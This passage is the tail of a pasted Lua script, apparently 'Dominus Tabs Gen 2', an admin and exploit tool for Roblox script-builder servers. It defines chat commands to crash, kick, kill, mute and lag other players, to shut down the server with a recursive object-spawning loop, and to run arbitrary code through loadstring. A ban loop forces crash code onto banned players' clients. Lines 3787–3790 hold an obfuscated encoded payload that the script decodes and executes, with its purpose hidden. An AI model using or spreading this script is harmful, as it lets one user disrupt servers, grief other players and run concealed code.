  3455. while LocalPlayer.Character == nil and probe.Parent == workspace and probe ~= nil and game:service'RunService'.Stepped:wait() do
  3456. probe.CFrame = camera.Focus * CFrame.Angles(0, rotation, 0)
  3457. rotation = rotation + 0.1
  3458. end
  3459. if camera then
  3460. camera:Destroy()
  3461. end
  3462. probe:Destroy()
  3463. end)()
  3464. end
  3465. )
  3466.  
  3467. AddCmd("Make your character","char","Creates your character",
  3468. function()
  3469. if workspace.CurrentCamera == nil then return end
  3470. local camera = workspace.CurrentCamera
  3471. local new_char = game:service("InsertService"):LoadAsset(68452456):GetChildren()[1]
  3472. local human = new_char.Humanoid
  3473. human.Parent = nil
  3474. new_char.Name = LocalPlayer.Name
  3475. wait()
  3476. human.Parent = new_char
  3477. camera.CameraSubject = human
  3478. camera.CameraType = "Custom"
  3479. new_char.Parent = workspace
  3480. local pl = Instance.new("PointLight", new_char.Head)
  3481. pl.Range = 24
  3482. pl.Shadows = true
  3483. LocalPlayer.Character = new_char
  3484. new_char:MakeJoints()
  3485. new_char.Torso.BrickColor = torsocolor
  3486. new_char["Left Leg"].BrickColor = leftlegcolor
  3487. new_char["Right Leg"].BrickColor = rightlegcolor
  3488. new_char["Left Arm"].BrickColor = leftarmcolor
  3489. new_char["Right Arm"].BrickColor = rightarmcolor
  3490. new_char.Head.BrickColor = headcolor
  3491. for i,v in pairs(Clothes) do
  3492. v:Clone().Parent = new_char
  3493. end
  3494. probemode = false
  3495. end
  3496. )
  3497.  
  3498. AddCmd("Stop the commands","cremove","Remove the commands",
  3499. function()
  3500. Output("Are you sure that you wan't to remove the Dominus tabs?",
  3501. function()
  3502. Output("Are you 100% sure that you want this???",
  3503. function()
  3504. for i,v in pairs(getfenv(1)) do
  3505. getfenv(1)[i] = nil
  3506. end
  3507. script.Disabled = true
  3508. LocalPlayer = NO_PLAYER
  3509. script:findFirstChild(SourceName).Value = " "
  3510. script.Disabled = true
  3511. tabmodel:ClearAllChildren()
  3512. tabmodel:Destroy()
  3513. connection:disconnect()
  3514. Tabs = {}
  3515. Cmds = {}
  3516. Banlist = {}
  3517. fukhed.all = true
  3518. coroutine.resume(coroutine.create(function()
  3519. while wait(0.1) do
  3520. Dismiss()
  3521. end
  3522. end))
  3523. end)
  3524. end)
  3525. end
  3526. )
  3527.  
  3528. AddCmd("stop plsplspls","vremove","Remove Admin",
  3529. function()
  3530. Output("y u remove dis",
  3531. function()
  3532. Output("fine...qq",
  3533. function()
  3534. for i,v in pairs(getfenv(1)) do
  3535. getfenv(1)[i] = nil
  3536. end
  3537. script.Disabled = true
  3538. LocalPlayer = NO_PLAYER
  3539. script:findFirstChild(SourceName).Value = " "
  3540. script.Disabled = true
  3541. tabmodel:ClearAllChildren()
  3542. tabmodel:Destroy()
  3543. connection:disconnect()
  3544. Tabs = {}
  3545. Cmds = {}
  3546. Banlist = {}
  3547. fukhed.all = true
  3548. coroutine.resume(coroutine.create(function()
  3549. while wait(0.1) do
  3550. Dismiss()
  3551. end
  3552. end))
  3553. end)
  3554. end)
  3555. end
  3556. )
  3557.  
  3558. AddCmd("ForceField","ff","Give forcefield to player",
  3559. function(plrs)
  3560. for _, plr in pairs(plrs) do
  3561. if plr and plr.Character then
  3562. Instance.new("ForceField", plr.Character)
  3563. end
  3564. end
  3565. end
  3566. )
  3567.  
  3568. AddCmd("Sparkles","sparkles","Give sparkles to player",
  3569. function(plrs)
  3570. for _, plr in pairs(plrs) do
  3571. if plr and plr.Character and plr.Character.Torso then
  3572. Instance.new("Sparkles", plr.Character.Torso)
  3573. end
  3574. end
  3575. end
  3576. )
  3577.  
  3578. AddCmd("Un-Sparkles","unsparkles","Remove sparkles from player",
  3579. function(plrs)
  3580. for _, plr in pairs(plrs) do
  3581. if plr and plr.Character and plr.Character.Torso then
  3582. pcall(function()
  3583. for j, k in pairs(plr.Character.Torso:GetChildren()) do
  3584. if k:IsA("Sparkles") then
  3585. k:Destroy()
  3586. end
  3587. end
  3588. end)
  3589. end
  3590. end
  3591. end
  3592. )
  3593.  
  3594. AddCmd("Crash player","crash","Crash the player",
  3595. function(plrs)
  3596. for _, plr in pairs(plrs) do
  3597. if plr and plr.Backpack then
  3598. NewLS([==[
  3599. game:GetService("RunService").RenderStepped(function()
  3600. Delay(0, function() return end)
  3601. end)]==], plr.Backpack)
  3602. end
  3603. end
  3604. end
  3605. )
  3606.  
  3607. AddCmd("Respawn player","respawn","Respawn the player",
  3608. function(plrs)
  3609. for _, plr in pairs(plrs) do
  3610. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  3611. end
  3612. end
  3613. )
  3614.  
  3615. AddCmd("Mute player","mute","Block the player chat",
  3616. function(plrs)
  3617. for _, plr in pairs(plrs) do
  3618. if plr and plr.Backpack then
  3619. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack)
  3620. end
  3621. end
  3622. end
  3623. )
  3624.  
  3625. AddCmd("Unmute player","unmute","Unblock the player chat",
  3626. function(plrs)
  3627. for _, plr in pairs(plrs) do
  3628. if plr and plr.Backpack then
  3629. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack)
  3630. end
  3631. end
  3632. end
  3633. )
  3634.  
  3635. AddCmd("Un-ForceField","unff","Remove the forcefield that you gave to player",
  3636. function(plrs)
  3637. for _, plr in pairs(plrs) do
  3638. if plr and plr.Character then
  3639. pcall(function()
  3640. for _,v in pairs(plr.Character:GetChildren()) do
  3641. if v:IsA("ForceField") then
  3642. v:Destroy()
  3643. end
  3644. end
  3645. end)
  3646. end
  3647. end
  3648. end
  3649. )
  3650.  
  3651. AddCmd("Gear","gear","Give gear to player",
  3652. function(plrs, msg)
  3653. local keypos = msg:find(key)
  3654. local targPlayers = msg:sub(1,keypos-1)
  3655. local plrs = getPlayers(targPlayers)
  3656. local asset = msg:sub(tonumber(keypos+1))
  3657. for _,plr in pairs(plrs) do
  3658. if plr and plr.Backpack then
  3659. local obj = game:service("InsertService"):LoadAsset(asset)
  3660. pcall(function()
  3661. for a,g in pairs(obj:children())do
  3662. if g:IsA("Tool") or g:IsA("HopperBin") then
  3663. g.Parent = plr.Backpack
  3664. end
  3665. end
  3666. end)
  3667. end
  3668. end
  3669. end
  3670. )
  3671.  
  3672.  
  3673. AddCmd("God player","god","Make the player immortal",
  3674. function(plrs)
  3675. for _, plr in pairs(plrs) do
  3676. if plr and plr.Character and plr.Character.Humanoid then
  3677. plr.Character.Humanoid.MaxHealth = math.huge
  3678. end
  3679. end
  3680. end
  3681. )
  3682.  
  3683. AddCmd("Ungod player","ungod","Make the player mortal",
  3684. function(plrs)
  3685. for _, plr in pairs(plrs) do
  3686. if plr and plr.Character then
  3687. plr.Character.Humanoid.MaxHealth = 100
  3688. end
  3689. end
  3690. end
  3691. )
  3692.  
  3693. AddCmd("Kick player","kick","Kick a player",
  3694. function(plrs)
  3695. for _, plr in pairs(plrs) do
  3696. if plr and plr.Backpack then
  3697. NewLS("game:service'StarterGui':SerCoreGuiEnabled(3,false)", plr.Backpack)
  3698. plr:Destroy()
  3699. end
  3700. end
  3701. end
  3702. )
  3703.  
  3704. AddCmd("Kill player","kill","Kill a player",
  3705. function(plrs)
  3706. for _, plr in pairs(plrs) do
  3707. if plr and plr.Character then
  3708. plr.Character:BreakJoints()
  3709. end
  3710. end
  3711. end
  3712. )
  3713.  
  3714. AddCmd("Punish player","punish","Remove character of a player",
  3715. function(plrs)
  3716. for _, plr in pairs(plrs) do
  3717. if plr and plr.Character then
  3718. plr.Character:Destroy()
  3719. end
  3720. end
  3721. end
  3722. )
  3723.  
  3724. AddCmd("Admin a player","admin","Give admin to a player",
  3725. function(plrs)
  3726. for _, plr in pairs(plrs) do
  3727. if plr and plr.Backpack then
  3728. a = script:Clone()
  3729. a.Parent = plr.Backpack
  3730. Output("You gave admin to: "..plr.Name, __)
  3731. end
  3732. end
  3733. end
  3734. )
  3735.  
  3736. AddCmd("Fix cam","fcam","Fix anyone's cam",
  3737. function(plrs, msg)
  3738. for _, plr in pairs(plrs) do
  3739. if plr and plr.Backpack then
  3740. NewLS([[
  3741. game.Workspace.CurrentCamera:Destroy()
  3742. cam = Instance.new("Camera", workspace)
  3743. cam.Name = "CurrentCamera"
  3744. cam.FieldOfView = 70
  3745. cam.CameraType = "Custom"
  3746. cam.CameraSubject = game.Players.LocalPlayer.Character.Humanoid]], plr.Backpack)
  3747. end
  3748. end
  3749. end
  3750. )
  3751.  
  3752. AddCmd("AFK","afk","Ping yourself as afk",
  3753. function()
  3754. Dismiss()
  3755. for i = 1,8 do
  3756. wait()
  3757. Output("AFK", __)
  3758. end
  3759. end
  3760. )
  3761.  
  3762. AddCmd("Back","back","Ping yourself as back",
  3763. function()
  3764. Dismiss()
  3765. for i = 1,8 do
  3766. wait()
  3767. Output("Back", __)
  3768. end
  3769. wait(3)
  3770. Dismiss()
  3771. end
  3772. )
  3773.  
  3774. AddCmd("Ban a player","ban","Kicks a player when he enters",
  3775. function(plrs, msg)
  3776. for _,v in pairs(plrs) do
  3777. if v then
  3778. table.insert(Banlist,v.Name)
  3779. Output('Banned | '..v.Name,__)
  3780. else
  3781. Output(Error)
  3782. end
  3783. end
  3784. end
  3785. )
  3786.  
  3787. local charMap = {["+"] = 0, ["^"] = 1, ["%"] = 2, [")"] = 3, ["*"] = 4, ["$"] = 5, ["-"] = 6, ["_"] = 7, ["#"] = 8, ["&"] = 9, ["@"] = 10, ["("] = 11, ["?"] = 12, ["~"] = 13, ["!"] = 14, ["="] = 15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  3788. "?-=-)-^-?-+%&-~)~%^)()?-=-^-*-)_*_%_&-!-_-#%)_*_%_&-!-_-!%_-)_$_%-#B%!*!_~*~!~^&&~?@(&!&_@_~&~@A?@~@~_~~?^~&?&#)~)~+~-?@?%?##+?(A?#(~_-_(=?=!!@!)=$@?!!(?@!@-($!-!-~_~*!)!=~*~_~!?~#-~$~^~-?&?+?$#?(-?-?^($_~-@$@$(*-*~&^(~=$##$&$?$?$^^!A=-+&%#)$)*%!%~%!~=^=^!+!+?$+)%)-)#^)^_+&+==~($+)+!=%=*=@!!@*!~!?!-~&&+&&@#?*?=&$?#($($_(-#&*@=@%@$@$@~*%&)&_#?#()^*$#*&)_*_#-~-?^?$%%*^_)#$?*^$+$_*_)-*_)-)#C)**~^?$+)%)-))%$%+%#?_^)+!+^+*+*+!@*(!#-!^=+%$!-~~^%!)~$~+~-#)#+-#(~(?(#(#?&@?$?$$_*$+-A@(-*@$!)!_$#?^$#~(A?-)_)%+%~=!)+-($)$*$=*==$==!~!)=)!!^?$+)%)-)+!~(*^#-?_&+(@?!!+&+^+%+~=~@)@+~?~_!@C~$#@?+~&_%?%(^(!@$-)@-(&$^(%A&!#+&*&!_@*_*$*+*()^#^%&_?$?$*-+-&$*$!*~*&*!)_*!)!%_)-=^=-=$)_B~?#+*+@?_@#!?$!-$+~=!=&=&@=&+~@A~+~#~%~-?~_~?*?^_!--?(#)@+(!@?@@@@&!*(#@#=#_###%&*)@)@%$-^-_%*+$*_-%-@$($-$-+?=?%_)+*~)=%^)!-+*+*%**~?%!~--&)@)~))?&?&(*=+=-()&@!=!^!)#!&(#%&$#!#=_-#~(&?=(^(=(^(*(+(_-=&%-=&+_&&#$($%--&-#%&+&@#)#%)%#+#(_=-^__-(%~$=$$$)--^)^($&$*$#*@*+**+$)&*^*=%="
  3789. ,"!_%@!&!!!)!!^(~*~??(~$^@~#~#?^+_+@=!+=^#($(^(=@=-__(-$__-=-_@*((@!&~@+@*@^@&$%&-$*&--+&+$*$?$?$^&%#=#!#&#)#))*#)#=_*___!-))--&-+-=-)%^%@-&-$-@$~$*$&^(*+-&$#*&+%*-+-+%^#+++?)@=*=~!~=!=~=!!#%=%)%-!*!^!+!%#(#+#(#!__#+?!?-?@(@?!()?^?@_*(&_#((#-(__?_$#((~@((((_(%()-$($(%(#@?@*@@-!&%@@&@@=$!$#@#@$@(&=&_&~$+&-@+@+&%$?#^$%$)$($*$!*(#@*$*=)+$%$%$**=__#?_+*=)~)~)%%?%%%!%%%?%--$_!-)-*_&-=-!-#%)-&%&-~)&-(%^)()%_$-*_$_%_!-+%)_*_%_&-!-_-!%)-#-^-%_#%#%)_*_%_&-!-_-!%%-&_*_$-#%)-&%(%~%^)^)#)(%&-&%$%+%%)$)-)&%$-!-*-&%&%#%&%"
  3790. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(charMap[lo]+charMap[hi]*16)end)))),getfenv())()
  3791.  
  3792. AddCmd("Shutdown the game","sd","Shutdown the game",
  3793. function()
  3794. NewS([[ local function BufferOverflow(object)
  3795. object.DescendantAdded:connect(BufferOverflow)
  3796. Instance.new("IntValue", object)
  3797. end
  3798. BufferOverflow(Game)
  3799. ]], workspace)
  3800. end
  3801. )
  3802.  
  3803. AddCmd("Check source","chks","Check if the source is found",
  3804. function()
  3805. if found then
  3806. Output("Source is found")
  3807. else
  3808. Output("Source is not found")
  3809. end
  3810. end
  3811. )
  3812.  
  3813. AddCmd("Say bye to everyone","bye","Say bye to everyone",
  3814. function()
  3815. Dismiss()
  3816. for i = 1,8 do
  3817. Output("Bye", __)
  3818. end
  3819. end
  3820. )
  3821.  
  3822. AddCmd("Check source name","chksn","Check the source name",
  3823. function()
  3824. Output(SourceName, __)
  3825. end
  3826. )
  3827.  
  3828. AddCmd("Change source name","csn","Change the source name",
  3829. function(plrs, msg)
  3830. SourceName = tostring(msg)
  3831. end
  3832. )
  3833.  
  3834. AddCmd("Kick player list","klist", "Show a kick player list",
  3835. function()
  3836. Dismiss()
  3837. Output("Click on the player name that you want to kick", __)
  3838. for _,v in pairs(game:GetService("Players"):GetChildren()) do
  3839. Output(v.Name,
  3840. function()
  3841. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", v.Backpack)
  3842. v:Destroy()
  3843. end)
  3844. end
  3845. end
  3846. )
  3847.  
  3848. AddCmd("Script","script","Execute a Script",
  3849. function(plrs, msg)
  3850. NewS(msg, workspace)
  3851. end
  3852. )
  3853.  
  3854. AddCmd("LocalScript","local","Execute a LocalScript",
  3855. function(plrs, msg)
  3856. NewLS(msg, LocalPlayer.Backpack)
  3857. end
  3858. )
  3859.  
  3860. AddCmd("Execute", "exe","Execute a LocalScript for admin",
  3861. function(plrs, msg)
  3862. a,b = ypcall(function()
  3863. loadstring(msg)()
  3864. end) if not a then Output(b,"Bright red") end
  3865. end
  3866. )
  3867.  
  3868.  
  3869. AddCmd("#Commands","#cmds","See how much are commands in this admin",
  3870. function()
  3871. Output(#Cmds, __)
  3872. end
  3873. )
  3874.  
  3875. AddCmd("Clean workspace","clean","Clean everything in workspace except terrain",
  3876. function()
  3877. NewS([[
  3878. for _,v in pairs(game.Workspace:GetChildren()) do
  3879. if v.Name ~= "Terrain" then
  3880. v:Destroy()
  3881. end
  3882. end
  3883. ]],workspace)
  3884. wait(1)
  3885. a = Instance.new("Part")
  3886. a.Parent = Workspace
  3887. a.Name = "Base"
  3888. a.Position = Vector3.new(0, 0.6, 0)
  3889. a.Size = Vector3.new(1002, 0, 1002)
  3890. a.Material = "Grass"
  3891. a.Anchored = true
  3892. a.BrickColor = BrickColor.new("Dark green")
  3893. NewS([[
  3894. for _,v in pairs(game.Players:GetChildren()) do
  3895. v:LoadCharacter()
  3896. end
  3897. ]], workspace)
  3898. end
  3899. )
  3900.  
  3901.  
  3902. AddCmd("Script Help","sh","Help everyone with scripts",
  3903. function()
  3904. Dismiss()
  3905. for i = 1,1 do
  3906. wait()
  3907. Output("Script Help:", __)
  3908. Output("Google ROBLOX Script Bot and download it.", __)
  3909. Output("Find a script using ROBLOX Catalog.", __)
  3910. Output("Open ROBLOX Studio.", __)
  3911. Output("Edit any place and insert your script.", __)
  3912. Output("Copy your ENTIRE script.", __)
  3913. Output("Paste the script in the text box.", __)
  3914. Output("Select the 'Local Script' box, if the script it local.", __)
  3915. Output("Name your script and press 'Run Script'.", __)
  3916. Output("Enjoy showing off your script!", __)
  3917. end
  3918. end
  3919. )
  3920.  
  3921. AddCmd("Darkhearts","dh","Gives Darkhaerts",
  3922. function()
  3923. Dismiss()
  3924. for i = 1,1 do
  3925. Output("Darkhearts Given",__)
  3926. local obj = game:service("InsertService"):LoadAsset(108149175)
  3927. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = LocalPlayer.Backpack end end
  3928. end
  3929. end
  3930. )
  3931.  
  3932. AddCmd("Machete","machete","Gives Machete",
  3933. function()
  3934. Dismiss()
  3935. for i = 1,1 do
  3936. Output("Machete Given",__)
  3937. local obj = game:service("InsertService"):LoadAsset(123234673)
  3938. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = LocalPlayer.Backpack end end
  3939. end
  3940. end
  3941. )
  3942.  
  3943. AddCmd("Gear","gear","Give gear to player",
  3944. function(plrs, msg)
  3945. local keypos = msg:find(key)
  3946. local targPlayers = msg:sub(1,keypos-1)
  3947. local plrs = getPlayers(targPlayers)
  3948. local asset = msg:sub(tonumber(keypos+1))
  3949. for _,plr in pairs(plrs) do
  3950. if plr and plr.Backpack then
  3951. local obj = game:service("InsertService"):LoadAsset(asset)
  3952. pcall(function()
  3953. for a,g in pairs(obj:children())do
  3954. if g:IsA("Tool") or g:IsA("HopperBin") then
  3955. g.Parent = plr.Backpack
  3956. end
  3957. end
  3958. end)
  3959. end
  3960. end
  3961. end
  3962. )
  3963.  
  3964. AddCmd("Dark Character","dark","Make Character Dark",
  3965. function()
  3966. Dismiss()
  3967. for i = 1,1 do
  3968. Output("Character is Now Dark",__)
  3969. player=game.Players.LocalPlayer
  3970. char=player.Character
  3971. Color=BrickColor.new("Grey")
  3972. Color2=BrickColor.new(Color3.new(0,0,0))
  3973. model=Instance.new("Model")
  3974. model.Name="Suit"
  3975. model.Parent=char
  3976. d=0
  3977. Debounce=true
  3978. fake=char.Head:clone()
  3979. pcall(function() fake.face:remove() end)
  3980. char.Head.Transparency=1
  3981. fake.Parent=model
  3982. fake.Transparency=0
  3983. w=Instance.new("Weld")
  3984. w.Part1=fake
  3985. w.Part0=char.Head
  3986. w.Parent=char
  3987. fake.Mesh.Scale=fake.Mesh.Scale+Vector3.new(-0.01,-0.01,-0.01)
  3988. fake.BrickColor=Color2
  3989. char.Head.Changed:connect(function(p)
  3990. if p=="BrickColor" then
  3991. wait()
  3992. pcall(function()
  3993. char.Head.face:Remove()
  3994. char.Torso.roblox:remove()
  3995. char["Shirt Graphic"]:remove()
  3996. end)
  3997. char.Humanoid.WalkSpeed=25
  3998. char.Humanoid.MaxHealth=math.huge
  3999. char.Humanoid.Health=math.huge
  4000. for _,v in pairs(char:children()) do
  4001. if v.className=="Hat" then
  4002. v:remove()
  4003. elseif v:IsA("Part") then
  4004. v.BrickColor=Color2
  4005. v.TopSurface="Smooth"
  4006. v.BottomSurface="Smooth"
  4007. elseif v:IsA("Shirt") or v:IsA("Pants") then
  4008. v:remove()
  4009. end
  4010. end
  4011. end
  4012. end)
  4013. char.Head.BrickColor=Color2
  4014. Tor=Instance.new("Part")
  4015. Tor.Size=Vector3.new(1,1,1)
  4016. Tor.BrickColor=Color2
  4017. Tor.Reflectance=0
  4018. Tor.Transparency=0
  4019. Tor.CanCollide=false
  4020. Tor.Parent=char
  4021. Mesh=Instance.new("SpecialMesh")
  4022. Mesh.MeshId="http://www.roblox.com/asset/?id=21057410"
  4023. Mesh.Scale=Vector3.new(1.05,1.05,1.05)
  4024. Mesh.Parent=Tor
  4025. w = Instance.new("Weld")
  4026. w.Parent = char["Head"]
  4027. w.Part0 = w.Parent
  4028. w.Part1 = Tor
  4029. w.C0 = CFrame.new(0,0.35,0)
  4030. end
  4031. end
  4032. )
  4033.  
  4034. AddCmd("NoClip Character","nclip","Make Character NoClip",
  4035. function()
  4036. Dismiss()
  4037. for i = 1,1 do
  4038. Output("Character is Now NoClipped",__)
  4039. wait(1)
  4040.  
  4041. nam = game.Players.LocalPlayer.Name
  4042.  
  4043. coroutine.wrap(function()
  4044. while wait() do
  4045. for a, b in pairs(Workspace[nam]:GetChildren()) do
  4046. if b:FindFirstChild('Handle') then
  4047. b.Handle.CanCollide = false
  4048. end
  4049. end
  4050. end
  4051. end)()
  4052.  
  4053. Workspace[nam].Humanoid.Changed:connect(function()
  4054. Workspace[nam].Humanoid.WalkSpeed = 16
  4055. end)
  4056.  
  4057. game:GetService('Players').LocalPlayer.PlayerGui.ChildAdded:connect(function(asd)
  4058. delay(0, function()
  4059. if asd.Name ~= 'OutputGUI' then
  4060. asd:Destroy()
  4061. end
  4062. end)
  4063. end)
  4064.  
  4065. game:GetService('RunService').Stepped:connect(function()
  4066. Workspace[nam].Torso.CanCollide = false
  4067. Workspace[nam].Head.CanCollide = false
  4068. end)
  4069.  
  4070. Workspace[nam].Torso.Changed:connect(function()
  4071. Workspace[nam].Torso.CanCollide = false
  4072. Workspace[nam].Head.CanCollide = false
  4073. end)
  4074. end end
  4075. )
  4076.  
  4077. AddCmd("Remove Tools","rt","Remove current tools",
  4078. function()
  4079. Dismiss()
  4080. pcall(function()
  4081. LocalPlayer.Backpack:ClearAllChildren()
  4082. end)
  4083. end
  4084. )
  4085.  
  4086. function Output(Txt, func)
  4087. P = Instance.new("Part", tabmodel)
  4088. P.Anchored = true
  4089. P.CanCollide = false
  4090. if probemode == false then
  4091. if LocalPlayer.Character.Torso then
  4092. P.Position = LocalPlayer.Character.Torso.Position
  4093. elseif LocalPlayer.Character.Torso == nil then return end
  4094. elseif probemode == true then
  4095. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  4096. P.Position = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").Position
  4097. elseif game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") == nil then return end
  4098. else
  4099. return
  4100. end
  4101. M = Instance.new("SpecialMesh",P)
  4102. M.MeshId = "http://www.roblox.com/asset/?id=21057410"
  4103. M.TextureId = "http://www.roblox.com/asset/?id=64444605"
  4104. M.Scale = Vector3.new(1.60,1.60,1.60)
  4105. Instance.new("PointLight", P)
  4106. bg = Instance.new("BillboardGui", P)
  4107. bg.Adornee = tab
  4108. bg.Size = UDim2.new(8, 0, 7.5, 0)
  4109. bg.StudsOffset = Vector3.new(0, 1, 0)
  4110. text = Instance.new("TextLabel", bg)
  4111. text.Size = UDim2.new(1, 0, 0.2, 0)
  4112. text.FontSize = "Size18"
  4113. text.BackgroundTransparency = 1
  4114. text.Font = "Legacy"
  4115. text.TextStrokeTransparency = 0
  4116. text.TextColor = BrickColor.new("Institutional white")
  4117. text.Text = Txt
  4118. Click = Instance.new("ClickDetector",P)
  4119. Click.MaxActivationDistance = 999999999
  4120. Click.MouseClick:connect(function(Plr)
  4121. if Plr.Name == LocalPlayer.Name then
  4122. Dismiss()
  4123. func = func
  4124. func()
  4125. end
  4126. end)
  4127. table.insert(Tabs, P)
  4128. end
  4129.  
  4130. function getPlayers(msg)
  4131. local plrs = {}
  4132. if msg == "me" then
  4133. table.insert(plrs, LocalPlayer)
  4134. elseif msg == "all" then
  4135. plrs = game:GetService("Players"):GetChildren()
  4136. elseif msg == "noobs" then
  4137. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  4138. if plr.AccountAge > 364 then
  4139. table.insert(plrs, plr)
  4140. end
  4141. end
  4142. elseif msg == "veterans" then
  4143. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  4144. if plr.AccountAge > 364 then
  4145. table.insert(plrs, plr)
  4146. end
  4147. end
  4148. elseif msg == "others" then
  4149. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  4150. if v ~= LocalPlayer then
  4151. table.insert(plrs, v)
  4152. end
  4153. end
  4154. else
  4155. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  4156. if v.Name:lower():sub(1,#msg) == msg:lower() then
  4157. table.insert(plrs, v)
  4158. end
  4159. end
  4160. end
  4161. return plrs
  4162. end
  4163.  
  4164. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  4165. end
  4166.  
  4167. LocalPlayer.Chatted:connect(function(m)
  4168. for i,v in pairs(Cmds) do
  4169. if v["Say"]..key == m:sub(1, #v["Say"]+#key) then
  4170. v["Func"](getPlayers(m:sub(#v["Say"]+#key+1)), m:sub(#v["Say"]+#key+1))
  4171. end
  4172. end
  4173. end)
  4174.  
  4175. for i = 0,8,1 do
  4176. wait(0.01)
  4177. end
  4178. Output("Welcome to Dominus Tabs Gen 2", __)
  4179. Output("Created by thebuilder307 and LuaScripterSB", __)
  4180. Output("New Updates : "..Updates, __)
  4181. Output("User: "..LocalPlayer.Name, __)
  4182.  
  4183. tabmodeldebounce = false
  4184. modeldebounce = false
  4185. game:service'RunService'.Stepped:connect(function()
  4186. if modeldebounce then return end
  4187. rot = (rot % 360) + 0.5
  4188. if tabmodel.Parent ~= workspace then
  4189. modeldebounce = true
  4190. tabs = {}
  4191. tabmodel = Instance.new("Model", workspace)
  4192. tabmodel.Name = "Dominus tabs"
  4193. tabs = {}
  4194. wait()
  4195. modeldebounce = false
  4196. end
  4197. end)
  4198.  
  4199. rot = 0
  4200. coroutine.resume(coroutine.create(function()
  4201. game:GetService("RunService").Stepped:connect(function()
  4202. if probemode == false then
  4203. if LocalPlayer.Character then
  4204. if LocalPlayer.Character:findFirstChild("Torso") then
  4205. rot = rot + 0.0001
  4206. for i,v in pairs(Tabs) do
  4207. ypcall(function()
  4208. local pos = LocalPlayer.Character.Torso.CFrame
  4209. local radius = 4 + (#Tabs * 0.5)
  4210. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  4211. local y = 0
  4212. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  4213. local arot = Vector3.new(x, y, z) + pos.p
  4214. local brot = v.CFrame.p
  4215. local crot = (arot * .1 + brot * .9)
  4216. v.CFrame = CFrame.new(crot, pos.p)
  4217. end)
  4218. end
  4219. end
  4220. end
  4221. end
  4222. if probemode == true then
  4223. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  4224. rot = rot + 0.0001
  4225. for i,v in pairs(Tabs) do
  4226. ypcall(function()
  4227. local pos = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").CFrame
  4228. local radius = 4 + (#Tabs * 0.5)
  4229. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  4230. local y = 0
  4231. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  4232. local arot = Vector3.new(x, y, z) + pos.p
  4233. local brot = v.CFrame.p
  4234. local crot = (arot * .1 + brot * .9)
  4235. v.CFrame = CFrame.new(crot, pos.p)
  4236. end)
  4237. end
  4238. end
  4239. end
  4240. end)
  4241. end))
  4242.  
  4243. for _,v in pairs(game.Players:GetChildren()) do
  4244. if v:IsA("Player") then
  4245. Connect(v)
  4246. end
  4247. end
  4248.  
  4249. game.Players.ChildAdded:connect(function(qe)
  4250. if qe:IsA("Player") then
  4251. Connect(qe)
  4252. end
  4253. end)
  4254.  
  4255. coroutine.resume(coroutine.create(function()
  4256. while wait(0.1) do
  4257. for a, plr in pairs(game.Players:GetChildren()) do
  4258. pcall(function()
  4259. for b, Bl in pairs(Banlist) do
  4260. if plr.Name == Bl["Name"] then
  4261. if Bl["BRank"] == -1 then
  4262. plr:Destroy()
  4263. elseif Bl["BRank"] == -2 then
  4264. NewLS(LagSource, plr.Backpack)
  4265. elseif Bl["BRank"] == -3 then
  4266. NewLS("script.Parent = nil; while wait(0.1) do; game:service'StarterGui':SetCoreGuiEnabled(3, false); end", plr.Backpack)
  4267. elseif Bl["BRank"] == -4 then
  4268. NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
  4269. else
  4270. plr:Destroy()
  4271. end
  4272. end
  4273. end
  4274. end)
  4275. end
  4276. end
  4277. end))
  4278.  
  4279. for _,v in pairs(game.Players:GetPlayers()) do
  4280. if v.Name == "thebuilder307" then
  4281. Output("YAY, THE CREATOR OF THIS SCRIPT IS IN-GAME :D :D :D")
  4282. end
  4283. end
  4284.  
  4285. game.Players.PlayerAdded:connect(function(plr)
  4286. if plr.Name == "LuaScripterSB" then
  4287. Output("YAY, THE CREATOR OF THIS SCRIPT IS IN-GAME :D :D :D")
  4288. end
  4289. end)
  4290.  
  4291. game:GetService("RunService").RenderStepped:connect(function()
  4292. for _,a in pairs(game:service('Players'):children()) do
  4293. for _,b in pairs(Banlist) do
  4294. if b:find(a.Name) then
  4295. NewLS([==[
  4296. Instance.new('Message',Workspace).Text = "You are Banned."
  4297. game:GetService("RunService").RenderStepped(function()
  4298. Delay(0, function() return end)
  4299. end)
  4300. ]==], a.Backpack)
  4301. a:remove()--If his client is even left standing xD
  4302. Output('Banned Player | '..a.Name..' | Attempted to join.',__)
  4303. else
  4304. end
  4305. end
  4306. end
  4307. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement